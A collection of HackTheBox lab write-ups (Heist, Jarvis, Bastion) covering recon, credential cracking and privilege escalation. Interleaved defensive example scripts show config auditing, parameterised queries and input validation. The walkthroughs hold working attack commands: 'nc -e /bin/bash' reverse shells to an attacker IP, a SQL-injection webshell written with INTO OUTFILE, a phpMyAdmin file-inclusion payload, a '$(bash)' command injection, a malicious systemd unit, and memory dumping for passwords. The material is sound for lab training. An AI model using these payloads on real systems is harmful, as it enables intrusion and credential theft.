HTB Heist Writeup

No.4 - Heist - Difficulty: Easy - HTB walkthrough

Attack box: official Kali Linux 2019 64-bit
Author: Ikonw

Target overview

1. Port scanning

nmap -sV -sC heist.htb

Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-25T01:23:05
|_ start_date: N/A

2. HTTP enumeration

Opening the website, it's a login page. No CMS was identified; at the bottom right there's a "Login as guest".
It turns out to be a support desk-like platform.
Clicking Attachment redirects to config.txt:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh

Three of the lines contain hashes:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91  // Type 5 
!
username rout3r password 7 0242114B0E143F015F5D1E161713 //Type 7
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 //type 7

As mentioned earlier, these should be Cisco hashes, type 5 and type 7 respectively. Type 5 is salted.
I used online tools to crack them.

Type 5 is more troublesome; the online tools could not find the password.
I found a GitHub script.
Now we have all the accounts and passwords:

Account  Password
admin    $uperP@ssword
rout3r   Q4)sJu\Y8qz*A3?d
Hazard   stealth1agent
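A leaked router config like the one above is a good test case for a config audit. The script below is an added example, not code from the original post: it picks out every `password`/`secret` line of the config.txt shown earlier, classifies it by Cisco password type, and for type 7 recovers the plaintext with Cisco's long-published fixed XOR key, which is the whole point a defender needs to make: `service password-encryption` (type 7) is obfuscation, not encryption, and type 5 is salted MD5 that a wordlist can still crack, so both should be migrated to type 8 (PBKDF2) or type 9 (scrypt) secrets and never left in configs that get attached to tickets. The config lines are the page's own; the regex and function names are this example's.

```python
import re

# Cisco's fixed key for "password 7" (type 7) obfuscation; public since the 1990s.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded):
    """Reverse a type 7 string: two decimal digits of seed, then hex bytes XORed with the key."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("not a type 7 string")
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


# The credential-bearing lines of the config.txt shown above (page values, not constructed).
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

# Matches "enable secret N ..." and "username X [privilege N] password N ..." lines.
SECRET_RE = re.compile(
    r"^(?:enable\s+)?(?:username\s+(?P<user>\S+)\s+(?:privilege\s+\d+\s+)?)?"
    r"(?:password|secret)\s+(?P<type>\d+)\s+(?P<value>\S+)$"
)


def audit_config(text):
    """One finding per credential line: account, storage type, verdict and (type 7 only) plaintext."""
    findings = []
    for line in text.splitlines():
        m = SECRET_RE.match(line.strip())
        if not m:
            continue
        account = m["user"] or "enable"
        ptype = int(m["type"])
        if ptype == 7:
            verdict, plaintext = "reversible obfuscation; treat as plaintext", decode_type7(m["value"])
        elif ptype == 5:
            verdict, plaintext = "salted MD5; crackable offline by wordlist, migrate to type 8/9", None
        elif ptype in (8, 9):
            verdict, plaintext = "PBKDF2/scrypt; acceptable", None
        else:
            verdict, plaintext = "unknown type; review", None
        findings.append({"account": account, "type": ptype, "plaintext": plaintext, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f)
```

Feed it any IOS-style config; lines that merely contain the word "password" (such as `service password-encryption`) are not matched because the pattern requires a numeric type after the keyword.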

3. Getting a shell

I tried logging in to the website with the existing accounts and passwords, but it says an email address is required. Trying examples like admin@heist.htb went nowhere either.

Use Metasploit's smb_login to brute force.
Only Hazard:stealth1agent can log in.
The permissions are all No Access and READ:

root@xing# smbmap -H 10.10.10.149 -u hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445 Name: 10.10.10.149
Disk    Permissions
----    -----------
ADMIN$  NO ACCESS
C$      NO ACCESS
IPC$    READ ONLY

IPC$ (Internet Process Connection) is the resource that shares "named pipes": a named pipe opened to allow inter-process communication. By supplying a trusted username and password, the two sides of a connection can establish a secure channel and exchange encrypted data over it, thereby gaining access to the remote computer.

Here we can use the READ ONLY IPC$ share to obtain local account information.

Connect with rpcclient:

rpcclient -U "Hazard%stealth1agent" heist.htb

We can likewise use SIDs to obtain usernames.
The last four digits of the SID are the user's number; by incrementing it we can find the names of the local users:

lookupsids S-1-5-21-4254423774-1266059056-3197185112-1008

Three more users are found: Chase, support, Jason.

Another way is to use impacket (good stuff):

root@xing:/opt# locate lookupsid.py
/usr/share/doc/python3-impacket/examples/lookupsid.py

root@xing:/opt# python /usr/share/doc/python3-impacket/examples/lookupsid.py Hazard:stealth1agent@10.10.10.149
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

I tried all kinds of combinations but still could not log in to SMB or the web,
so I decided to run nmap again to see whether any high ports had been missed,
and found port 5985 open.

WinRM is a Windows service for convenient remote management; with the WinRM service enabled, servers can be managed remotely in day-to-day work, or multiple servers managed at once through scripts, improving efficiency.

A tool called evil-winrm can be used to log in here.

Those interested can read more:
Evil-WinRM remote management shell

First, use Metasploit's scanner/winrm/winrm_login module to brute force the accounts and passwords.
(With so many accounts and passwords, which password goes with which?)

Save all the newly obtained accounts into possible_user,
then fill in the DOMAIN obtained from lookupsid.

Successfully obtained a valid login:

Chase:Q4)sJu\Y8qz*A3?d

Log in with evil-winrm:

ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

4. Privilege escalation

After some exploration, a Firefox process is found running.
Use Microsoft's procdump to dump the Firefox process:

https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

Upload procdump.exe with evil-winrm and run it:

upload procdump.exe
procdump -ma 2892

Afterwards, grep the dump for admin and the password is found.
Log in with evil-winrm and grab the root flag.




HTB Jarvis Writeup

Quite an interesting machine; there are several ways to get a low-priv shell.

Attack box: official Kali Linux 2019 64-bit
Author: Ikonw

Target overview

1. Port scanning

Only HTTP is of much interest; the title is Stark Hotel.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 11:48 +08
Nmap scan report for jarvis.htb (10.10.10.143)
Host is up (0.33s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. HTTP enumeration

First habit: get gobuster running.

gobuster dir -w directory-list-2.3-medium.txt -u 10.10.10.143 -t 50

phpmyadmin is found.
After some attempts, the default accounts and passwords don't work. Skip it for now.

继续浏览 stark hotel(钢铁侠爱好者,stark 和 jarvis)

Several suspicious domain names appear on the pages

supersecurehotel.htb
logger.htb

Try adding them to /etc/hosts

10.10.10.143 jarvis.htb supersecurehotel@logger.htb supersecurehotel.htb logger.htb

Then visit the site using jarvis.htb, supersecurehotel.htb and logger.htb in turn. The result is the same as before, with no difference at all. We keep exploring.

After some random clicking, room.php looks suspicious.
Try appending a double quote

http://10.10.10.143/room.php?cod=1"

Sure enough, it throws an error.
Next, we can use ORDER BY or UNION SELECT to find out how many columns the query selects.

ORDER BY

First use an ORDER BY clause to determine the number of columns in the SQL query. ORDER BY sorts on a column of the query result; if that column does not exist, the query errors.

Start by trying 10

http://10.10.10.143/room.php?cod=1 ORDER BY 10

The page renders abnormally, meaning there are not 10 columns; try smaller numbers one at a time.
At 7 the page returns normally

http://10.10.10.143/room.php?cod=1 ORDER BY 7

Confirmed: there are 7 columns.
Next we use UNION SELECT to find out which positions are reflected on the page

http://10.10.10.143/room.php?cod=999 UNION SELECT 1,2,3,4,5,6,7

Column 1 is presumably the ID, so it is not displayed.
2 is the star rating
3 is the price
4 is the description
5 is the image
6 and 7 are unknown. None of that really matters; what matters is that we can see the reflected positions.

We can use some MySQL functions to get more information, for example database().
The database is called hotel

http://10.10.10.143/room.php?cod=999 UNION SELECT 1,2,database(),4,5,6,7
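Added example (not code from the original writeup): a small sqlite3 model of room.php showing why ORDER BY n reveals the column count when cod is concatenated into the query, and why a parameterised query never reacts to the injected clause. The table and column names are constructed.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the table behind room.php: seven columns,
    # matching the count the writeup finds with ORDER BY 7.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE room (cod INTEGER, star INTEGER, price INTEGER, "
               "descrip TEXT, image TEXT, mini TEXT, extra TEXT)")
    db.execute("INSERT INTO room VALUES (1, 5, 100, 'Suite', 'r1.jpg', 'x', 'y')")
    return db

DB = make_db()

def room_vulnerable(db, cod):
    """String concatenation: the request parameter becomes part of the SQL text."""
    try:
        return db.execute(f"SELECT * FROM room WHERE cod={cod}").fetchall()
    except sqlite3.OperationalError:
        return None  # the "page renders abnormally" case in the writeup

def room_safe(db, cod):
    """Parameterised: the value is bound as data and never parsed as SQL."""
    return db.execute("SELECT * FROM room WHERE cod=?", (cod,)).fetchall()

def count_columns(query_fn, max_cols=10):
    """Walks ORDER BY n downward from max_cols, as the writeup does, until the
    result matches the normal page for cod=1. Returns the column count, or
    None when the endpoint never reacts to the injected clause (the safe case)."""
    baseline = query_fn(DB, 1)
    for n in range(max_cols, 0, -1):
        if query_fn(DB, f"1 ORDER BY {n}") == baseline:
            return n
    return None

if __name__ == "__main__":
    print("vulnerable endpoint column count:", count_columns(room_vulnerable))  # 7
    print("parameterised endpoint column count:", count_columns(room_safe))     # None
```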


3. Getting a shell

We have two ways to get www-data.

The first is to use MySQL's file write to inject PHP that executes nc

SELECT ... INTO OUTFILE 'file_name'
http://10.10.10.143/room.php?cod=999 UNION SELECT 1,2,'<?php system("nc -e /bin/bash 10.10.14.10 1234");?>',4,5,6,7 INTO OUTFILE '/var/www/html/malicious.php'

Then we visit 10.10.10.143/malicious.php
and get a shell.


The second way is to dump the database usernames and passwords with MySQL functions and log in to phpMyAdmin.

group_concat joins the values within one group and returns a single string; ":" is used as the separator

room.php?cod=999 union select 1,2,(select group_concat(user,":",password,":",host) from mysql.user),4,5,6,7

We obtain the database account and its password hash

Dbadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
Use crackstation.net to crack the hash
The password is imissyou

Going back to the phpMyAdmin found earlier and logging in, we see
Apache/2.4.25
phpmyadmin 4.8.0
At the time of writing, the latest phpMyAdmin release is 5.0.1.
A round of searchsploit shows that versions 4.8.0 and 4.8.1 have a file inclusion vulnerability that leads to remote code execution

phpMyAdmin 4.8 file inclusion vulnerability (link)

First, run the SQL command

select '<?php system("nc -e /bin/bash 10.10.14.12 1234");?>'

Grab the session ID value
Then visit

10.10.10.143/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_b6uigkomnmk4oaa91ckc4chk4nfahaqi

Success!

4. Escalating to another user

The first thing is to try sudo -l and see whether there are any exploitable permissions.

Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py


This is a small alerting tool.
Looking closely at the source, there is a spot open to command injection: a small blacklist filters some characters, but $ is still allowed, so something like $(cmd) works.


sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(bash)
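Added example (not the machine's simpler.py, whose source is not reproduced here): a blacklist filter of the shape the writeup describes beside the allow-list check that should replace it. The FORBIDDEN list is an assumption about the original filter; the point is that $(...) passes a character blacklist but cannot pass an IP-address parser, and that passing argv as a list keeps a shell out of the path entirely.

```python
import ipaddress
import subprocess

# Assumed blacklist modelled on the writeup's description; not the real one.
FORBIDDEN = ["&", ";", "-", "`", "||", "|"]

def blacklist_allows(value):
    """The fragile approach: reject known-bad characters, let everything else through."""
    return not any(bad in value for bad in FORBIDDEN)

def is_ip_address(value):
    """Allow-list approach: the input must parse as an IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def build_ping_command(value):
    """Returns the argv list for ping, or None when the input is rejected.
    With a list and shell=False no shell ever sees the string, so $(...)
    is never expanded even if validation were somehow bypassed."""
    if not is_ip_address(value):
        return None
    return ["ping", "-c", "1", value]

def ping(value):
    """Hardened replacement for the injectable ping routine."""
    argv = build_ping_command(value)
    if argv is None:
        return "Rejected: not an IP address"
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout

if __name__ == "__main__":
    probe = "$(bash)"   # the input the writeup uses
    print("blacklist lets it through:", blacklist_allows(probe))   # True
    print("ip parser lets it through:", is_ip_address(probe))      # False
```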

We got pepper's shell.
For some reason none of my commands got any response here, so I spawned a fresh shell with nc

pepper@jarvis:/$nc -e /bin/bash 10.10.14.10 1234
nc -e /bin/bash 10.10.14.10 1234


So we now have pepper's privileges

5. Root privilege escalation

First, let's look at SUID files

find / -perm -4000 2>/dev/null

systemctl looks suspicious.
GTFOBins lists a way to escalate privileges through its SUID bit.
I generally prefer to do this kind of thing by hand.
Create a pwn.service in pepper's home directory and point ExecStart at nc.sh

[Service]
Type=oneshot
ExecStart=/home/pepper/nc.sh
[Install]
WantedBy=multi-user.target


nc.sh:
#!/bin/bash
nc -e /bin/bash 10.10.14.10 1234


Then we need to link the unit file

systemctl link /home/pepper/pwn.service

Open an nc listener

Then start our pwn service

systemctl start pwn

We got root




HTB Wall Writeup

This machine is quite interesting; as its name says, there is a "wall". Amusingly, the CVE in this machine's CMS and the machine itself were written by the same person.
The author tries to describe the pitfalls encountered along the way, as well as what was attempted and the reasoning behind it.

HTB Bastion Writeup

Attack box: official Kali Linux 2019 64-bit
Author: Ikonw


1. Port scan


A normal nmap port scan does not give much information; only SMB and SSH are open.

2. SMB Enumeration

First, connect to the target with smbclient.
There are many ways to do this, smbmap and the like, but I prefer the simple smbclient.
In a real environment, tools such as smbmap automatically perform a large number of operations and are easily captured in the logs.

smbclient -L //10.10.10.134


Found four shares, three of which are fairly ordinary.
The interesting one is Backups

Let's use smbclient to see whether it allows us to connect to Backups

smbclient \\\\10.10.10.134\\Backups

Here a backslash is used to escape a backslash, so four are needed before the host and two before Backups.


Connected successfully; there are three files. Download note.txt with get.
Roughly, the sysadmin advises against downloading the entire backup folder locally.
Judging by the folder names, this should be a Windows image backup.


So I try to mount the whole backup locally.
Create the folder /mnt/backup locally

mount -t cifs //10.10.10.134/Backups /mnt/backup -o rw

Mount it locally with read and write allowed


7z can list the contents of a vhd file directly. Let's read the 5 GB file straight away
(the file is large, so this takes about 2 minutes; there are many files, so only part of the listing is shown)

7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd


As you can see, this is almost a complete Windows backup.
Since it is a Windows backup, can we extract user account passwords straight from the SAM file?

3. User account passwords

7z only lets us see the files, not their contents.
I googled a bit and found a Medium post by someone who used guestmount to mount the virtual disk.
guestmount on Linux lets us get into the files of the virtual disk

Link: article

Following along with that post:
first we need to install the libguestfs-tools package

apt-get install libguestfs-tools

After the simple install, create a new folder /mnt/vhd

Mount the vhd on that folder

guestmount --add /mnt/backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6


We can now work inside the vhd file.
The first thing I want to do is see whether I can go straight to the user's desktop and grab user.txt

samdump2 can extract the hashes from the SAM for us


There are many ways to use the hashes; since SMB is open, a pass-the-hash attack could log in to the system directly.
Personally, I prefer trying to crack the password

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Note that Administrator and Guest are shown as disabled.
Normally the format is
<username>:<user ID>:<LM hash>:<NT hash>:<comment>:<home directory>
Administrator and Guest have exactly the same LM hash and NT hash.
Note that aad3... and 31d6... both stand for empty, meaning there is no value there.
End of digression.
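Added example (not from the original writeup): a parser for the samdump2/pwdump line format described above that flags disabled accounts and the two well-known empty hashes, then audits which enabled accounts still carry a usable hash. The sample input is constructed from the three lines shown in the writeup.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

# Constructed sample, copied from the samdump2 output shown in the writeup.
SAMPLE = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

def parse_pwdump_line(line):
    """Parses <user>:<rid>:<LM>:<NT>:<comment>:<home>, with samdump2's optional
    '*disabled*' prefix, into a dict with the empty-hash flags worked out."""
    disabled = line.startswith("*disabled*")
    if disabled:
        line = line[len("*disabled*"):].strip()
    user, rid, lm, nt, comment, home = line.split(":", 5)
    return {
        "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
        "disabled": disabled,
        "lm_empty": lm.lower() == EMPTY_LM,  # no LM hash stored (LM disabled)
        "nt_empty": nt.lower() == EMPTY_NT,  # blank password
        "comment": comment, "home": home,
    }

def audit(dump_text):
    """Returns (user, finding) pairs for every enabled account, so a defender
    can see which hashes in a leaked backup are actually usable."""
    findings = []
    for raw in dump_text.splitlines():
        if not raw.strip():
            continue
        e = parse_pwdump_line(raw)
        if e["disabled"]:
            continue
        if e["nt_empty"]:
            findings.append((e["user"], "enabled account with blank password"))
        elif not e["lm_empty"]:
            findings.append((e["user"], "legacy LM hash stored (trivially crackable)"))
        else:
            findings.append((e["user"], "enabled account with NT hash only"))
    return findings

if __name__ == "__main__":
    for user, finding in audit(SAMPLE):
        print(f"{user}: {finding}")  # L4mpje: enabled account with NT hash only
```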

Throw L4mpje's hash at crackstation.net to crack it
and we get the credentials
L4mpje:bureaulampje


Unfortunately we do not have RDP, but we do have SSH (doge)

ssh L4mpje@10.10.10.134
password: bureaulampje

Got a cmd shell.
Now let's prepare for privilege escalation.
On Windows, my habit is to run the JAWS script to gather system information that helps me escalate.

Link: JAWS GitHub

Since this is my first post, a quick word on how to transfer files onto Windows.
There are many ways to do it;
some work in one situation, others in another.
I'll just mention the one method I personally like:
PowerShell

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.12/jaws-enum.ps1','C:\Users\L4mpje\Desktop\jaws-enum.ps1')"

End of digression

Run jaws-enum.ps1

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

A quick look turned up nothing interesting, but one item caught my attention:
mRemoteNG

4. Privilege escalation

When we run into unfamiliar software we ask Google, and sure enough, this software has rather weak protection of its stored passwords.
From another article we learn that the stored password file lives under AppData.

Link: article

Another digression.
AppData is a hidden folder; a plain dir will not show it


Use dir /a to list all files, including hidden ones


Found the administrator's stored password


Use a Python script from GitHub to recover the password

Link: GitHub

python3 mremote_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

Got the password
thXLHM96BeKL0ER2


Then SSH in as the administrator and grab root.txt




